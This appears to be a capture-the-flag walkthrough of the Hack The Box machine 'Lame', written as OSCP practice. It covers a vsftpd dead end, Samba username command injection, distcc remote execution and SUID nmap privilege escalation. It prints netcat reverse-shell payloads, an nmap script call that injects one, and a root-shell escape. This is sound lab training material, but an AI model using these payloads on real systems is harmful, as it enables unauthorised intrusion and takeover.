Lame is a straightforward machine that is great practice for preparing for the OSCP. It enforces some solid concepts, offers a rabbit role and allows for other means of exploitation.
In a nutshell Lame, a linux box, is exploited through a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3. By specifying a username containing shell meta characters, attackers can execute arbitrary commands.
The rabbit hole on this box is a vulnerable FTP version, which we’ll explore and explain why it cannot be exploited.
Another method of rooting this box is to exploit a vulnerable service running on port 3632 called
distcc. Once we’re able to gain an initial foothold onto the machine, we then need escalate our privileges. Through some basic enumeration we see that nmap runs as root and all thats left is to breakout and get a root shell using some basic nmap commands.
As for the OSCP what did this box teach me:
- Enumerate for all ports. Our initial scan did not show port 3632 open.
- Leave no stone unturned. We checked FTP, we ran into some trouble on SMB. If we couldn’t figure out a workaround for SMB, we could have used the distcc vulnerability.
- How to use nmap to scan/exploit/privilege escalate
So without further adieu:
Walkthrough for Lame
The IP for Lame is
First step as always is a nmap scan of the target host:
sudo nmap -sC -sV -Pn -oA nmap/lame 10.10.10.3
After we received our initial results we will run two more thorough scans, one for all ports and one for UD
ALLPORTS: sudo nmap -p- -oA nmap/lame-allports 10.10.10.3 UDP: sudo nmap -p- -oA nmap/lame-UDP-allports 10.10.10.3
Our initial nmap scan returns a few open ports:
21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn? 445/tcp open microsoft-ds?
My first reaction is to start poking around at port 21 and answer two questions:
- Does it allow anonymous authentication
- Is the version vulnerable
The FTP server does allow anonymous authentication
But nothing really much going on inside here…the directory is empty.
Next lets check the version:
Searchsploit returns two backdoors for this current version, one with metasploit and one without. Let’s pull this exploit down and see if it works.
To pull exploits down from searchsploit we use this command
searchsploit -m <fileName> searchsploit -m 49757
Next step is to open the file in a text editor and see how it works
- The exploit is using “USER nergal:)” as the username, after some research we could use ANY username as long as we append ‘ 🙂 ‘ to it.
- It’s calling out to telnet on port 6200
So lets start up a netcat listener and let her rip!
I run the script
It eventually times out.
After some research, it seems the backdoor was in fact removed:
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. -ExploitDB
Now that we know port 21 is not exploitable, we can move on to port 22. Spoiler alert, not vulnerable either.
Back to our nmap results our next step is to check on ports 139 and 445, good old SMB.
I enumerated a little bit futher on ports 139 and 445 to get the version numbers:
My next step was to use searchsploit once again:
The two most interesting ones to me are the ones where I am able execute some commands. The first one is a Metasplolit module but searchsploit still allows me to pull down the exploit script. I’ll pull the script down and see if anything in the code gives me a hint as to how it works.
The exploit seems to work by specifying a username containing shell meta characters.
We can break down this exploit a step further:
nohup command executes another program specified as its argument and ignores all
sighup (hangup) signals.
In Linux ` ` are used to execute and put the output in place.
So it seems to me that I could put in some payload that results in a reverse shell and this username script will execute it.
I head over to pentestmonkey for their cheat sheet on reverse shells and I devided to go with the netcat version.
nc -e /bin/sh 10.0.0.1 1234 We then subsitute our IP and port of our choice.
I put together my payload and attempt to login. My netcat immeditely picks up and boom!
While it seems that the exploit worked and it caught on my nc listner, when I ran the command
whoami I noticed that I connected to my own machine. I had to do some research on this and it seems the way smbclient handles login requests jacks up the payload so we have to find another way to login to smb.
I decided to connect to SMB and change usernames utilizing the
logon command and voila, we’re connected as root. I am able to retreive both flags from this shell.
I thought about what the best way to search for exploits on distcc. I used google and searchsploit to which I had instant success. Google made mentioned of an nmap script that can be used to exploit this vulnerable version so I decided to use the vuln scanner thats built into the nmap scripting engine.
We can tell right away that exploit worked because the nmap outputs the
uid for the user
daemon. I wanted to look more at this script and see if I could decipher what is going on.
Full disclosure, I pulled down the metasploit exploit and couldn’t make out exactly what was going on. I plan to return later on in the future but for now I found another way.
So lets use the
locate command and get the distcc script.
cat the results to the screen:
How convenient, don’t you love when an exploit script tells you exactly what to do!
I copied and pasted the command above and subsitutued
id for a reverse shell simialr to the one we used during the smb exploit.
And it failed.
Why? The script is using the old name and not the new name we downloaded to our machine.
The actual command is
namp -p 3632 10.10.16.2 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.16.2 1234'"
I sent up a listener on port 1234 and connection was a success!
Now that we have a shell as user daemon. It’s time to start the privesc process.
I tried to get LinEnum on this machine via
curl but I kept running into trouble. So I did some poking around and decided to check the SUID permissions. A quick
find search shows the output below.
And I notice right off the bat that
nmap is running as root.
I decided to head over to GTFO Bins and saw the nmap can actually spawn a root shell.
nmap --interactive nmap> !sh
This leads us to root!
All in all this was a fun box and it allowed me to work out a few issues here and there which is a great learning experience. I think I will revisit this box and focus soley on the
distcc portion. I believe there are more ways to exploit this service and I would like to understand the metasploit script a bit more.
Oh and before I forget, all these shells being spawn from netcat are not very “interactive” so don’t forget:
python -c 'import pty;pty.spawn("/bin/sh")'